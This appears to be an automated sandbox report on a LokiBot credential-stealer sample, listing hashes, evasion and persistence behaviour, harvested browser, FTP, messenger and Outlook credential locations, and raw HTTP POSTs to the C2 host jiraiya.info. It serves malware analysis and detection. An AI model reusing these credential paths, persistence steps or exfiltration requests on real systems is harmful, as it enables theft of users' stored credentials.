· 6 years ago · Sep 04, 2019, 12:56 AM
1
2* ID: 888
3* MalFamily: "Loki"
4
5* MalScore: 10.0
6
7* File Name: "Loki_a3b2bcb88650a5852ca8a0485391ce42.1"
8* File Size: 925696
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "af04fe80f80a0b0495958377aa099019d46890dd5fc79a5ea33c87ece98e90cd"
11* MD5: "a3b2bcb88650a5852ca8a0485391ce42"
12* SHA1: "305af5c09f5a3add010e1ee82250d24d310d630c"
13* SHA512: "d6222fa1bb03acd96c2e1cc2b7c6e2ef7749bcdd43ff038e7b429c42a14010adc1a25f78ef643e8e3aa942d9bfe5b318770ab76c756a52ef997a8127c7d88598"
14* CRC32: "CDF8A7A3"
15* SSDEEP: "1536:xOXjYijDzy0bBZI3uMaDvBj5QIZv/uyrszBBYb4VCCVVUjMQvEq2cAGMOyn6gCDp:I3og55QKv9b4PoLvh2cQ27eruRYK"
16
17* Process Execution:
18 "nGo8VQ9y.exe",
19 "wscript.exe",
20 "filename.exe",
21 "filename.exe",
22 "explorer.exe",
23 "services.exe",
24 "lsass.exe",
25 "WmiApSrv.exe",
26 "svchost.exe",
27 "WmiPrvSE.exe"
28
29
30* Executed Commands:
31 "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\"",
32 "C:\\Users\\user\\subfolder\\filename.vbs ",
33 "\"C:\\Users\\user\\subfolder\\filename.exe\"",
34 "C:\\Users\\user\\subfolder\\filename.exe ",
35 "C:\\Windows\\system32\\lsass.exe",
36 "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
37 "C:\\Windows\\system32\\svchost.exe -k netsvcs"
38
39
40* Signatures Detected:
41
42 "Description": "Behavioural detection: Executable code extraction",
43 "Details":
44
45
46 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
47 "Details":
48
49
50 "Description": "Possible date expiration check, exits too soon after checking local time",
51 "Details":
52
53 "process": "nGo8VQ9y.exe, PID 2432"
54
55
56
57
58 "Description": "Guard pages use detected - possible anti-debugging.",
59 "Details":
60
61
62 "Description": "Detected script timer window indicative of sleep style evasion",
63 "Details":
64
65 "Window": "WSH-Timer"
66
67
68
69
70 "Description": "A process attempted to delay the analysis task.",
71 "Details":
72
73 "Process": "filename.exe tried to sleep 904 seconds, actually delayed analysis time by 0 seconds"
74
75
76
77
78 "Description": "Reads data out of its own binary image",
79 "Details":
80
81 "self_read": "process: nGo8VQ9y.exe, pid: 2432, offset: 0x00000000, length: 0x000e2000"
82
83
84 "self_read": "process: wscript.exe, pid: 2680, offset: 0x00000000, length: 0x00000040"
85
86
87 "self_read": "process: wscript.exe, pid: 2680, offset: 0x000000f0, length: 0x00000018"
88
89
90 "self_read": "process: wscript.exe, pid: 2680, offset: 0x000001e8, length: 0x00000078"
91
92
93 "self_read": "process: wscript.exe, pid: 2680, offset: 0x00018000, length: 0x00000020"
94
95
96 "self_read": "process: wscript.exe, pid: 2680, offset: 0x00018058, length: 0x00000018"
97
98
99 "self_read": "process: wscript.exe, pid: 2680, offset: 0x000181a8, length: 0x00000018"
100
101
102 "self_read": "process: wscript.exe, pid: 2680, offset: 0x00018470, length: 0x00000010"
103
104
105 "self_read": "process: wscript.exe, pid: 2680, offset: 0x00018640, length: 0x00000012"
106
107
108
109
110 "Description": "A process created a hidden window",
111 "Details":
112
113 "Process": "nGo8VQ9y.exe -> C:\\Users\\user\\subfolder\\filename.vbs"
114
115
116 "Process": "nGo8VQ9y.exe -> C:\\Users\\user\\subfolder\\filename.exe"
117
118
119
120
121 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
122 "Details":
123
124 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
125
126
127 "http_version_old": "HTTP traffic uses version 1.0"
128
129
130 "suspicious_request_iocs": "http://jiraiya.info/joe23/five/fre.php"
131
132
133
134
135 "Description": "Performs some HTTP requests",
136 "Details":
137
138 "url_iocs": "http://jiraiya.info/joe23/five/fre.php"
139
140
141
142
143 "Description": "A scripting utility was executed",
144 "Details":
145
146 "command": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\""
147
148
149
150
151 "Description": "Behavioural detection: Injection (Process Hollowing)",
152 "Details":
153
154 "Injection": "filename.exe(788) -> filename.exe(2468)"
155
156
157
158
159 "Description": "Executed a process and injected code into it, probably while unpacking",
160 "Details":
161
162 "Injection": "filename.exe(788) -> filename.exe(2468)"
163
164
165
166
167 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
168 "Details":
169
170 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 136624 times"
171
172
173
174
175 "Description": "Steals private information from local Internet browsers",
176 "Details":
177
178 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
179
180
181
182
183 "Description": "Installs itself for autorun at Windows startup",
184 "Details":
185
186 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name"
187
188
189 "data": "C:\\Users\\user\\subfolder\\filename.vbs -cz"
190
191
192
193
194 "Description": "Creates a hidden or system file",
195 "Details":
196
197 "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
198
199
200 "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
201
202
203
204
205 "Description": "CAPE detected the Loki malware family",
206 "Details":
207
208
209 "Description": "File has been identified by 17 Antiviruses on VirusTotal as malicious",
210 "Details":
211
212 "Malwarebytes": "Trojan.MalPack.VB.Generic"
213
214
215 "Invincea": "heuristic"
216
217
218 "F-Prot": "W32/VBKrypt.ZA.gen!Eldorado"
219
220
221 "Symantec": "ML.Attribute.HighConfidence"
222
223
224 "APEX": "Malicious"
225
226
227 "Paloalto": "generic.ml"
228
229
230 "Sophos": "Mal/FareitVB-N"
231
232
233 "FireEye": "Generic.mg.a3b2bcb88650a585"
234
235
236 "SentinelOne": "DFI - Suspicious PE"
237
238
239 "Cyren": "W32/VBKrypt.ZA.gen!Eldorado"
240
241
242 "Microsoft": "Trojan:Win32/Wacatac.B!ml"
243
244
245 "Endgame": "malicious (high confidence)"
246
247
248 "Acronis": "suspicious"
249
250
251 "Cylance": "Unsafe"
252
253
254 "ESET-NOD32": "a variant of Win32/Injector.EHNM"
255
256
257 "Fortinet": "W32/Injector.EHNM!tr"
258
259
260 "CrowdStrike": "win/malicious_confidence_70% (W)"
261
262
263
264
265 "Description": "Creates a copy of itself",
266 "Details":
267
268 "copy": "C:\\Users\\user\\subfolder\\filename.exe"
269
270
271 "copy": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
272
273
274
275
276 "Description": "Drops a binary and executes it",
277 "Details":
278
279 "binary": "C:\\Users\\user\\subfolder\\filename.exe"
280
281
282
283
284 "Description": "Harvests credentials from local FTP client softwares",
285 "Details":
286
287 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
288
289
290 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
291
292
293 "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
294
295
296 "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
297
298
299 "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
300
301
302 "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
303
304
305 "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
306
307
308 "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
309
310
311 "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
312
313
314 "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
315
316
317
318
319 "Description": "Harvests information related to installed instant messenger clients",
320 "Details":
321
322 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
323
324
325
326
327 "Description": "Harvests information related to installed mail clients",
328 "Details":
329
330 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
331
332
333 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
334
335
336 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
337
338
339 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
340
341
342 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
343
344
345 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
346
347
348 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
349
350
351 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
352
353
354 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
355
356
357 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
358
359
360 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
361
362
363 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
364
365
366 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
367
368
369 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
370
371
372 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
373
374
375 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
376
377
378 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
379
380
381 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
382
383
384 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
385
386
387 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
388
389
390 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
391
392
393 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
394
395
396 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
397
398
399 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
400
401
402 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
403
404
405 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
406
407
408 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
409
410
411 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
412
413
414 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
415
416
417 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
418
419
420 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
421
422
423 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
424
425
426 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
427
428
429 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
430
431
432 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
433
434
435
436
437 "Description": "Created network traffic indicative of malicious activity",
438 "Details":
439
440 "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
441
442
443 "signature": "ET TROJAN LokiBot Fake 404 Response"
444
445
446 "signature": "ET TROJAN LokiBot Checkin"
447
448
449 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
450
451
452 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
453
454
455 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
456
457
458 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
459
460
461
462
463
464* Started Service:
465 "VaultSvc",
466 "wmiApSrv"
467
468
469* Mutexes:
470 "Local\\ZoneAttributeCacheCounterMutex",
471 "Local\\ZonesCacheCounterMutex",
472 "Local\\ZonesLockedCacheCounterMutex",
473 "6EFA73A4746045B65DEE781E",
474 "Global\\RefreshRA_Mutex_Lib",
475 "Global\\RefreshRA_Mutex",
476 "Global\\RefreshRA_Mutex_Flag",
477 "Global\\WmiApSrv"
478
479
480* Modified Files:
481 "C:\\Users\\user\\subfolder\\filename.exe",
482 "C:\\Users\\user\\subfolder\\filename.vbs",
483 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
484 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe",
485 "\\??\\WMIDataDevice",
486 "\\??\\PIPE\\samr",
487 "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
488 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
489 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
490 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
491 "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
492 "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
493 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
494 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER"
495
496
497* Deleted Files:
498 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
499 "C:\\Users\\user\\subfolder\\filename.exe"
500
501
502* Modified Registry Keys:
503 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
504 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
505 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name",
506 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
507 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
508 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed",
509 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
510 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
511 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
512 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
513 "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
514 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
515 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
516 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
517 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
518 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
519 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider"
520
521
522* Deleted Registry Keys:
523 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
524 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
525 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
526 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
527
528
529* DNS Communications:
530
531 "type": "A",
532 "request": "jiraiya.info",
533 "answers":
534
535 "data": "47.88.102.244",
536 "type": "A"
537
538
539
540
541
542* Domains:
543
544 "ip": "47.88.102.244",
545 "domain": "jiraiya.info"
546
547
548
549* Network Communication - ICMP:
550
551* Network Communication - HTTP:
552
553 "count": 2,
554 "body": "",
555 "uri": "http://jiraiya.info/joe23/five/fre.php",
556 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
557 "method": "POST",
558 "host": "jiraiya.info",
559 "version": "1.0",
560 "path": "/joe23/five/fre.php",
561 "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
562 "port": 80
563
564
565 "count": 16,
566 "body": "",
567 "uri": "http://jiraiya.info/joe23/five/fre.php",
568 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
569 "method": "POST",
570 "host": "jiraiya.info",
571 "version": "1.0",
572 "path": "/joe23/five/fre.php",
573 "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
574 "port": 80
575
576
577
578* Network Communication - SMTP:
579
580* Network Communication - Hosts:
581
582 "country_name": "United States",
583 "ip": "47.88.102.244",
584 "inaddrarpa": "",
585 "hostname": "jiraiya.info"
586
587
588
589* Network Communication - IRC: